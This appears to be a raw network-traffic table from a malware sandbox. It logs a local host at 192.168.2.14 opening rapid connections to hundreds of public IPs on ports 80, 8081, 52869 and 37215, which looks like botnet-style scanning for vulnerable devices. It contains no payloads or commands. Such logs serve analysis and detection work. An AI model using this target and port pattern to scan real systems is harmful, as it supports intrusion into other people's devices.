                                                Jul 20, 2024 23:05:34.838118076 CEST397468081192.168.2.1427.100.98.197
                                                Jul 20, 2024 23:05:34.838246107 CEST5286951636212.202.97.136192.168.2.14
                                                Jul 20, 2024 23:05:34.838252068 CEST8039188112.169.29.19192.168.2.14
                                                Jul 20, 2024 23:05:34.838263035 CEST808158254147.99.2.34192.168.2.14
                                                Jul 20, 2024 23:05:34.838291883 CEST3918880192.168.2.14112.169.29.19
                                                Jul 20, 2024 23:05:34.838294029 CEST5163652869192.168.2.14212.202.97.136
                                                Jul 20, 2024 23:05:34.838331938 CEST808159178147.99.2.34192.168.2.14
                                                Jul 20, 2024 23:05:34.838488102 CEST591788081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:34.839301109 CEST4001852869192.168.2.14100.147.99.239
                                                Jul 20, 2024 23:05:34.839615107 CEST566328081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.839615107 CEST566328081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.839673996 CEST5286954198107.117.108.202192.168.2.14
                                                Jul 20, 2024 23:05:34.839742899 CEST80815349214.35.198.9192.168.2.14
                                                Jul 20, 2024 23:05:34.839755058 CEST5419852869192.168.2.14107.117.108.202
                                                Jul 20, 2024 23:05:34.840584040 CEST80815440814.35.198.9192.168.2.14
                                                Jul 20, 2024 23:05:34.840624094 CEST544088081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.841243029 CEST80813659417.7.135.117192.168.2.14
                                                Jul 20, 2024 23:05:34.841247082 CEST575348081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.841248035 CEST80813962686.35.5.8192.168.2.14
                                                Jul 20, 2024 23:05:34.841253996 CEST528693807425.145.229.184192.168.2.14
                                                Jul 20, 2024 23:05:34.841351986 CEST3807452869192.168.2.1425.145.229.184
                                                Jul 20, 2024 23:05:34.841826916 CEST8047532112.7.137.162192.168.2.14
                                                Jul 20, 2024 23:05:34.841866970 CEST4753280192.168.2.14112.7.137.162
                                                Jul 20, 2024 23:05:34.841885090 CEST4854052869192.168.2.1450.167.84.34
                                                Jul 20, 2024 23:05:34.842314005 CEST3652080192.168.2.14112.166.204.59
                                                Jul 20, 2024 23:05:34.842622042 CEST534168081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.842622042 CEST534168081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.842957973 CEST80813883627.100.98.197192.168.2.14
                                                Jul 20, 2024 23:05:34.843558073 CEST543128081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.843678951 CEST80813974627.100.98.197192.168.2.14
                                                Jul 20, 2024 23:05:34.843791962 CEST397468081192.168.2.1427.100.98.197
                                                Jul 20, 2024 23:05:34.844350100 CEST5286940018100.147.99.239192.168.2.14
                                                Jul 20, 2024 23:05:34.844404936 CEST4001852869192.168.2.14100.147.99.239
                                                Jul 20, 2024 23:05:34.844645977 CEST808156632206.198.219.49192.168.2.14
                                                Jul 20, 2024 23:05:34.844747066 CEST4816052869192.168.2.1439.176.203.73
                                                Jul 20, 2024 23:05:34.845119953 CEST3721526454157.111.32.23192.168.2.14
                                                Jul 20, 2024 23:05:34.845125914 CEST3721526454157.189.255.35192.168.2.14
                                                Jul 20, 2024 23:05:34.845130920 CEST372152645458.212.164.118192.168.2.14
                                                Jul 20, 2024 23:05:34.845145941 CEST372152645441.9.39.61192.168.2.14
                                                Jul 20, 2024 23:05:34.845150948 CEST372152645441.250.147.204192.168.2.14
                                                Jul 20, 2024 23:05:34.845150948 CEST603628081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.845150948 CEST603628081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.845160961 CEST3721526454179.127.198.84192.168.2.14
                                                Jul 20, 2024 23:05:34.845165968 CEST808147286151.153.104.167192.168.2.14
                                                Jul 20, 2024 23:05:34.845170021 CEST80815976285.73.99.232192.168.2.14
                                                Jul 20, 2024 23:05:34.845174074 CEST808145110213.31.81.52192.168.2.14
                                                Jul 20, 2024 23:05:34.845180035 CEST2645437215192.168.2.14157.111.32.23
                                                Jul 20, 2024 23:05:34.845180035 CEST2645437215192.168.2.1458.212.164.118
                                                Jul 20, 2024 23:05:34.845181942 CEST2645437215192.168.2.14157.189.255.35
                                                Jul 20, 2024 23:05:34.845181942 CEST2645437215192.168.2.1441.9.39.61
                                                Jul 20, 2024 23:05:34.845257044 CEST2645437215192.168.2.1441.250.147.204
                                                Jul 20, 2024 23:05:34.845730066 CEST2645437215192.168.2.14179.127.198.84
                                                Jul 20, 2024 23:05:34.846036911 CEST4138480192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:34.846069098 CEST3498080192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:34.846069098 CEST2747880192.168.2.1488.170.67.21
                                                Jul 20, 2024 23:05:34.846081018 CEST2747880192.168.2.1488.146.241.106
                                                Jul 20, 2024 23:05:34.846086979 CEST2747880192.168.2.1488.29.34.55
                                                Jul 20, 2024 23:05:34.846088886 CEST2747880192.168.2.1488.75.115.222
                                                Jul 20, 2024 23:05:34.846088886 CEST2747880192.168.2.1488.186.50.93
                                                Jul 20, 2024 23:05:34.846091986 CEST2747880192.168.2.1488.124.175.228
                                                Jul 20, 2024 23:05:34.846106052 CEST2747880192.168.2.1488.195.80.28
                                                Jul 20, 2024 23:05:34.846115112 CEST2747880192.168.2.1488.141.204.1
                                                Jul 20, 2024 23:05:34.846193075 CEST2747880192.168.2.1488.153.93.206
                                                Jul 20, 2024 23:05:34.846193075 CEST2747880192.168.2.1488.150.181.146
                                                Jul 20, 2024 23:05:34.846251965 CEST2747880192.168.2.1488.187.110.255
                                                Jul 20, 2024 23:05:34.846251965 CEST2747880192.168.2.1488.35.159.247
                                                Jul 20, 2024 23:05:34.846252918 CEST2747880192.168.2.1488.229.169.31
                                                Jul 20, 2024 23:05:34.846252918 CEST2747880192.168.2.1488.244.155.148
                                                Jul 20, 2024 23:05:34.846252918 CEST2747880192.168.2.1488.239.81.14
                                                Jul 20, 2024 23:05:34.846416950 CEST2747880192.168.2.1488.86.216.26
                                                Jul 20, 2024 23:05:34.846416950 CEST2747880192.168.2.1488.2.5.0
                                                Jul 20, 2024 23:05:34.846416950 CEST2747880192.168.2.1488.158.201.226
                                                Jul 20, 2024 23:05:34.846416950 CEST2747880192.168.2.1488.74.122.173
                                                Jul 20, 2024 23:05:34.846416950 CEST2747880192.168.2.1488.64.151.169
                                                Jul 20, 2024 23:05:34.846417904 CEST2747880192.168.2.1488.148.230.162
                                                Jul 20, 2024 23:05:34.846417904 CEST2747880192.168.2.1488.103.199.254
                                                Jul 20, 2024 23:05:34.846417904 CEST2747880192.168.2.1488.95.60.64
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.22.3.161
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.63.109.112
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.198.28.229
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.150.127.19
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.164.209.174
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.126.184.111
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.22.24.40
                                                Jul 20, 2024 23:05:34.846540928 CEST2747880192.168.2.1488.43.106.155
                                                Jul 20, 2024 23:05:34.846698046 CEST808157534206.198.219.49192.168.2.14
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.20.38.182
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.219.37.181
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.138.125.82
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.232.229.44
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.140.175.217
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.179.51.33
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.191.122.175
                                                Jul 20, 2024 23:05:34.846724033 CEST2747880192.168.2.1488.38.140.89
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.66.48.181
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.20.51.110
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.12.202.186
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.78.157.64
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.198.177.170
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.42.134.134
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.173.227.12
                                                Jul 20, 2024 23:05:34.846991062 CEST2747880192.168.2.1488.55.139.158
                                                Jul 20, 2024 23:05:34.847033024 CEST528694854050.167.84.34192.168.2.14
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.112.118.182
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.18.155.168
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.130.234.205
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.214.241.75
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.158.213.170
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.40.193.93
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.24.122.237
                                                Jul 20, 2024 23:05:34.847677946 CEST2747880192.168.2.1488.115.164.148
                                                Jul 20, 2024 23:05:34.847685099 CEST8036520112.166.204.59192.168.2.14
                                                Jul 20, 2024 23:05:34.847706079 CEST80815341689.203.134.23192.168.2.14
                                                Jul 20, 2024 23:05:34.848220110 CEST2747880192.168.2.1488.99.213.65
                                                Jul 20, 2024 23:05:34.848220110 CEST2747880192.168.2.1488.87.204.200
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.10.131.28
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.122.94.201
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.175.192.81
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.67.238.17
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.39.109.233
                                                Jul 20, 2024 23:05:34.848221064 CEST2747880192.168.2.1488.78.214.153
                                                Jul 20, 2024 23:05:34.848786116 CEST80815431289.203.134.23192.168.2.14
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.29.222.77
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.19.220.72
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.58.104.89
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.18.33.27
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.247.204.100
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.223.41.29
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.190.124.234
                                                Jul 20, 2024 23:05:34.848912001 CEST2747880192.168.2.1488.246.114.140
                                                Jul 20, 2024 23:05:34.849488974 CEST808156768196.214.28.4192.168.2.14
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.50.239.214
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.234.136.81
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.207.104.156
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.129.23.252
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.125.106.23
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.193.249.48
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.252.225.31
                                                Jul 20, 2024 23:05:34.850626945 CEST2747880192.168.2.1488.82.46.26
                                                Jul 20, 2024 23:05:34.851128101 CEST528694816039.176.203.73192.168.2.14
                                                Jul 20, 2024 23:05:34.851213932 CEST8081603628.15.94.154192.168.2.14
                                                Jul 20, 2024 23:05:34.851218939 CEST802747888.29.34.55192.168.2.14
                                                Jul 20, 2024 23:05:34.851223946 CEST802747888.124.175.228192.168.2.14
                                                Jul 20, 2024 23:05:34.851373911 CEST802747888.146.241.106192.168.2.14
                                                Jul 20, 2024 23:05:34.851604939 CEST802747888.86.216.26192.168.2.14
                                                Jul 20, 2024 23:05:34.851665974 CEST802747888.170.67.21192.168.2.14
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.4.159.39
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.180.42.106
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.199.52.80
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.148.47.202
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.124.127.219
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.119.209.79
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.195.233.216
                                                Jul 20, 2024 23:05:34.851769924 CEST2747880192.168.2.1488.156.210.49
                                                Jul 20, 2024 23:05:34.851785898 CEST802747888.153.93.206192.168.2.14
                                                Jul 20, 2024 23:05:34.851790905 CEST802747888.2.5.0192.168.2.14
                                                Jul 20, 2024 23:05:34.851795912 CEST802747888.195.80.28192.168.2.14
                                                Jul 20, 2024 23:05:34.852088928 CEST802747888.187.110.255192.168.2.14
                                                Jul 20, 2024 23:05:34.852374077 CEST802747888.22.3.161192.168.2.14
                                                Jul 20, 2024 23:05:34.852591991 CEST802747888.158.201.226192.168.2.14
                                                Jul 20, 2024 23:05:34.852596998 CEST802747888.75.115.222192.168.2.14
                                                Jul 20, 2024 23:05:34.852775097 CEST802747888.141.204.1192.168.2.14
                                                Jul 20, 2024 23:05:34.852818966 CEST802747888.35.159.247192.168.2.14
                                                Jul 20, 2024 23:05:34.853075027 CEST802747888.20.38.182192.168.2.14
                                                Jul 20, 2024 23:05:34.853079081 CEST802747888.63.109.112192.168.2.14
                                                Jul 20, 2024 23:05:34.853105068 CEST8034980112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.69.177.254
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.187.3.81
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.246.218.97
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.248.208.182
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.55.91.149
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.1.163.254
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.141.69.194
                                                Jul 20, 2024 23:05:34.853176117 CEST2747880192.168.2.1488.202.244.55
                                                Jul 20, 2024 23:05:34.853209019 CEST8041384112.91.135.215192.168.2.14
                                                Jul 20, 2024 23:05:34.853214025 CEST808145592213.125.79.161192.168.2.14
                                                Jul 20, 2024 23:05:34.853223085 CEST808134590141.238.111.1192.168.2.14
                                                Jul 20, 2024 23:05:34.853226900 CEST802747888.219.37.181192.168.2.14
                                                Jul 20, 2024 23:05:34.853235006 CEST802747888.150.181.146192.168.2.14
                                                Jul 20, 2024 23:05:34.853435993 CEST802747888.66.48.181192.168.2.14
                                                Jul 20, 2024 23:05:34.853440046 CEST802747888.99.213.65192.168.2.14
                                                Jul 20, 2024 23:05:34.854522943 CEST802747888.74.122.173192.168.2.14
                                                Jul 20, 2024 23:05:34.854526997 CEST802747888.87.204.200192.168.2.14
                                                Jul 20, 2024 23:05:34.854536057 CEST802747888.138.125.82192.168.2.14
                                                Jul 20, 2024 23:05:34.854551077 CEST802747888.186.50.93192.168.2.14
                                                Jul 20, 2024 23:05:34.854554892 CEST802747888.10.131.28192.168.2.14
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.117.109.221
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.70.219.235
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.10.200.101
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.108.53.73
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.241.201.128
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.8.74.147
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.178.251.242
                                                Jul 20, 2024 23:05:34.854773998 CEST2747880192.168.2.1488.65.9.150
                                                Jul 20, 2024 23:05:34.854964018 CEST802747888.198.28.229192.168.2.14
                                                Jul 20, 2024 23:05:34.854969025 CEST802747888.232.229.44192.168.2.14
                                                Jul 20, 2024 23:05:34.854976892 CEST802747888.64.151.169192.168.2.14
                                                Jul 20, 2024 23:05:34.855130911 CEST802747888.140.175.217192.168.2.14
                                                Jul 20, 2024 23:05:34.855135918 CEST802747888.20.51.110192.168.2.14
                                                Jul 20, 2024 23:05:34.855139971 CEST802747888.112.118.182192.168.2.14
                                                Jul 20, 2024 23:05:34.855144024 CEST802747888.29.222.77192.168.2.14
                                                Jul 20, 2024 23:05:34.855148077 CEST802747888.229.169.31192.168.2.14
                                                Jul 20, 2024 23:05:34.855156898 CEST802747888.19.220.72192.168.2.14
                                                Jul 20, 2024 23:05:34.855160952 CEST802747888.244.155.148192.168.2.14
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.168.88.184
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.53.175.59
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.22.99.213
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.174.43.133
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.132.9.252
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.78.228.219
                                                Jul 20, 2024 23:05:34.856211901 CEST3652080192.168.2.14112.166.204.59
                                                Jul 20, 2024 23:05:34.856211901 CEST2747880192.168.2.1488.75.115.222
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.155.239.144
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.211.65.199
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.7.51.177
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.6.152.217
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.197.219.136
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.224.82.131
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.57.109.151
                                                Jul 20, 2024 23:05:34.856304884 CEST2747880192.168.2.1488.159.239.89
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.147.208.98
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.2.254.101
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.247.34.34
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.22.146.177
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.195.21.152
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.131.252.51
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.233.207.76
                                                Jul 20, 2024 23:05:34.857290983 CEST2747880192.168.2.1488.251.254.150
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.182.93.37
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.131.39.143
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.88.136.149
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.189.181.30
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.155.152.244
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.159.208.53
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.143.43.155
                                                Jul 20, 2024 23:05:34.857484102 CEST2747880192.168.2.1488.160.212.102
                                                Jul 20, 2024 23:05:34.860008001 CEST2747880192.168.2.1488.124.73.62
                                                Jul 20, 2024 23:05:34.860008001 CEST2747880192.168.2.1488.64.213.40
                                                Jul 20, 2024 23:05:34.860008001 CEST2747880192.168.2.1488.172.202.45
                                                Jul 20, 2024 23:05:34.860008001 CEST2747880192.168.2.1488.88.186.94
                                                Jul 20, 2024 23:05:34.860008955 CEST2747880192.168.2.1488.11.85.127
                                                Jul 20, 2024 23:05:34.860008955 CEST2747880192.168.2.1488.138.194.154
                                                Jul 20, 2024 23:05:34.860008955 CEST2747880192.168.2.1488.110.195.185
                                                Jul 20, 2024 23:05:34.860008955 CEST2747880192.168.2.1488.45.84.237
                                                Jul 20, 2024 23:05:34.860213041 CEST4854052869192.168.2.1450.167.84.34
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.124.175.228
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.86.216.26
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.2.5.0
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.158.201.226
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.74.122.173
                                                Jul 20, 2024 23:05:34.860213041 CEST2747880192.168.2.1488.64.151.169
                                                Jul 20, 2024 23:05:34.860233068 CEST802747888.179.51.33192.168.2.14
                                                Jul 20, 2024 23:05:34.860238075 CEST802747888.12.202.186192.168.2.14
                                                Jul 20, 2024 23:05:34.860245943 CEST802747888.18.155.168192.168.2.14
                                                Jul 20, 2024 23:05:34.860294104 CEST802747888.239.81.14192.168.2.14
                                                Jul 20, 2024 23:05:34.860299110 CEST802747888.58.104.89192.168.2.14
                                                Jul 20, 2024 23:05:34.860307932 CEST802747888.50.239.214192.168.2.14
                                                Jul 20, 2024 23:05:34.860312939 CEST802747888.148.230.162192.168.2.14
                                                Jul 20, 2024 23:05:34.860321999 CEST802747888.191.122.175192.168.2.14
                                                Jul 20, 2024 23:05:34.860326052 CEST802747888.150.127.19192.168.2.14
                                                Jul 20, 2024 23:05:34.860330105 CEST802747888.78.157.64192.168.2.14
                                                Jul 20, 2024 23:05:34.860337973 CEST802747888.130.234.205192.168.2.14
                                                Jul 20, 2024 23:05:34.860342026 CEST802747888.18.33.27192.168.2.14
                                                Jul 20, 2024 23:05:34.860349894 CEST802747888.38.140.89192.168.2.14
                                                Jul 20, 2024 23:05:34.860366106 CEST802747888.247.204.100192.168.2.14
                                                Jul 20, 2024 23:05:34.860371113 CEST802747888.198.177.170192.168.2.14
                                                Jul 20, 2024 23:05:34.860374928 CEST802747888.164.209.174192.168.2.14
                                                Jul 20, 2024 23:05:34.860383034 CEST802747888.103.199.254192.168.2.14
                                                Jul 20, 2024 23:05:34.860387087 CEST802747888.223.41.29192.168.2.14
                                                Jul 20, 2024 23:05:34.860394001 CEST802747888.214.241.75192.168.2.14
                                                Jul 20, 2024 23:05:34.860399008 CEST802747888.234.136.81192.168.2.14
                                                Jul 20, 2024 23:05:34.860403061 CEST802747888.158.213.170192.168.2.14
                                                Jul 20, 2024 23:05:34.860410929 CEST802747888.207.104.156192.168.2.14
                                                Jul 20, 2024 23:05:34.860414982 CEST802747888.4.159.39192.168.2.14
                                                Jul 20, 2024 23:05:34.860419035 CEST802747888.95.60.64192.168.2.14
                                                Jul 20, 2024 23:05:34.860503912 CEST802747888.180.42.106192.168.2.14
                                                Jul 20, 2024 23:05:34.860507965 CEST802747888.40.193.93192.168.2.14
                                                Jul 20, 2024 23:05:34.860511065 CEST802747888.129.23.252192.168.2.14
                                                Jul 20, 2024 23:05:34.860774994 CEST802747888.122.94.201192.168.2.14
                                                Jul 20, 2024 23:05:34.860779047 CEST802747888.126.184.111192.168.2.14
                                                Jul 20, 2024 23:05:34.860788107 CEST802747888.199.52.80192.168.2.14
                                                Jul 20, 2024 23:05:34.860791922 CEST802747888.69.177.254192.168.2.14
                                                Jul 20, 2024 23:05:34.860869884 CEST2747880192.168.2.1488.192.0.2
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.240.60.173
                                                Jul 20, 2024 23:05:34.860871077 CEST4816052869192.168.2.1439.176.203.73
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.170.67.21
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.20.38.182
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.219.37.181
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.138.125.82
                                                Jul 20, 2024 23:05:34.860871077 CEST2747880192.168.2.1488.232.229.44
                                                Jul 20, 2024 23:05:34.860985994 CEST802747888.42.134.134192.168.2.14
                                                Jul 20, 2024 23:05:34.860990047 CEST802747888.22.24.40192.168.2.14
                                                Jul 20, 2024 23:05:34.860999107 CEST802747888.24.122.237192.168.2.14
                                                Jul 20, 2024 23:05:34.861002922 CEST802747888.125.106.23192.168.2.14
                                                Jul 20, 2024 23:05:34.861011982 CEST802747888.148.47.202192.168.2.14
                                                Jul 20, 2024 23:05:34.861016035 CEST802747888.115.164.148192.168.2.14
                                                Jul 20, 2024 23:05:34.861022949 CEST802747888.193.249.48192.168.2.14
                                                Jul 20, 2024 23:05:34.861027002 CEST802747888.173.227.12192.168.2.14
                                                Jul 20, 2024 23:05:34.861031055 CEST802747888.187.3.81192.168.2.14
                                                Jul 20, 2024 23:05:34.861040115 CEST802747888.175.192.81192.168.2.14
                                                Jul 20, 2024 23:05:34.861043930 CEST802747888.246.218.97192.168.2.14
                                                Jul 20, 2024 23:05:34.861047983 CEST802747888.190.124.234192.168.2.14
                                                Jul 20, 2024 23:05:34.861052036 CEST802747888.67.238.17192.168.2.14
                                                Jul 20, 2024 23:05:34.861058950 CEST802747888.248.208.182192.168.2.14
                                                Jul 20, 2024 23:05:34.861063004 CEST802747888.39.109.233192.168.2.14
                                                Jul 20, 2024 23:05:34.861186981 CEST802747888.252.225.31192.168.2.14
                                                Jul 20, 2024 23:05:34.861191034 CEST80814163881.72.49.108192.168.2.14
                                                Jul 20, 2024 23:05:34.861198902 CEST80816031857.96.182.14192.168.2.14
                                                Jul 20, 2024 23:05:34.861413956 CEST802747888.246.114.140192.168.2.14
                                                Jul 20, 2024 23:05:34.861418009 CEST802747888.82.46.26192.168.2.14
                                                Jul 20, 2024 23:05:34.861641884 CEST802747888.117.109.221192.168.2.14
                                                Jul 20, 2024 23:05:34.862035036 CEST8041384112.91.135.215192.168.2.14
                                                Jul 20, 2024 23:05:34.862039089 CEST8034980112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:34.862044096 CEST802747888.168.88.184192.168.2.14
                                                Jul 20, 2024 23:05:34.862051964 CEST802747888.70.219.235192.168.2.14
                                                Jul 20, 2024 23:05:34.862056017 CEST802747888.53.175.59192.168.2.14
                                                Jul 20, 2024 23:05:34.862411976 CEST802747888.124.127.219192.168.2.14
                                                Jul 20, 2024 23:05:34.862598896 CEST802747888.155.239.144192.168.2.14
                                                Jul 20, 2024 23:05:34.862602949 CEST802747888.78.214.153192.168.2.14
                                                Jul 20, 2024 23:05:34.862612963 CEST802747888.55.91.149192.168.2.14
                                                Jul 20, 2024 23:05:34.862641096 CEST802747888.55.139.158192.168.2.14
                                                Jul 20, 2024 23:05:34.862646103 CEST802747888.1.163.254192.168.2.14
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.141.204.1
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.112.118.182
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.18.155.168
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.130.234.205
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.214.241.75
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.158.213.170
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.40.193.93
                                                Jul 20, 2024 23:05:34.862742901 CEST2747880192.168.2.1488.24.122.237
                                                Jul 20, 2024 23:05:34.862771034 CEST802747888.10.200.101192.168.2.14
                                                Jul 20, 2024 23:05:34.862886906 CEST2747880192.168.2.1488.186.50.93
                                                Jul 20, 2024 23:05:34.862886906 CEST2747880192.168.2.1488.29.222.77
                                                Jul 20, 2024 23:05:34.862886906 CEST2747880192.168.2.1488.19.220.72
                                                Jul 20, 2024 23:05:34.862886906 CEST2747880192.168.2.1488.58.104.89
                                                Jul 20, 2024 23:05:34.862886906 CEST2747880192.168.2.1488.18.33.27
                                                Jul 20, 2024 23:05:34.862888098 CEST2747880192.168.2.1488.247.204.100
                                                Jul 20, 2024 23:05:34.862888098 CEST2747880192.168.2.1488.223.41.29
                                                Jul 20, 2024 23:05:34.862888098 CEST2747880192.168.2.1488.190.124.234
                                                Jul 20, 2024 23:05:34.862907887 CEST802747888.22.99.213192.168.2.14
                                                Jul 20, 2024 23:05:34.863789082 CEST802747888.211.65.199192.168.2.14
                                                Jul 20, 2024 23:05:34.863795042 CEST802747888.147.208.98192.168.2.14
